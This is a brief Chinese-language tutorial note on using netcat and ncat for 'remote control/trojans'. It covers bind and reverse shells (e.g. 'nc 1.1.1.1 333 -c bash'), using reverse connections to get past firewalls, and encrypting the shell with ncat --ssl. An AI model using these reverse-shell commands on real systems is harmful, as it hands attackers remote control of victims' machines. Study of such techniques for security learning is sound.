远程控制/木马
正向
哪个加bash,哪个被控制。
A:nc -lp 333 -c bash # -c 控制命令
B:nc 1.1.1.1 333
反向
A: nc 1.1.1.1 333 -c bash
B: nc -lp 333
在B上执行命令是对A机上进行的操作。
正向,服务器的防火墙一般不会打开陌生的333端口,服务器加强安全可以禁止内到外的连接,只开一个端口。所以远端通常连接不上,所以使用反向连接,在攻击端监听端口,被攻击端启动脚本,每次启动都会连接攻击者开的端口, Windows用户把bash改成cmd;
建立了连接以后可以获得客户端也可以获得服务端的shell。
加密所有流量
nc缺乏加密和身份验证的能力
ncat可以弥补nc一些缺陷,是nmap工具包中的命令。
A:ncat ncat -c bash --allow 192.168.20.1 -vnl 333 --ssl # 服务端 允许哪个ip连接我 开始监听
B:ncat -nv 1.1.1.1 333 --ssl
# 进行了密钥的通信
- ssl加密,根据来源地址进行限制。
- 功能很强大,但是版本很多,不同系统/平台的nc参数功能不尽相同。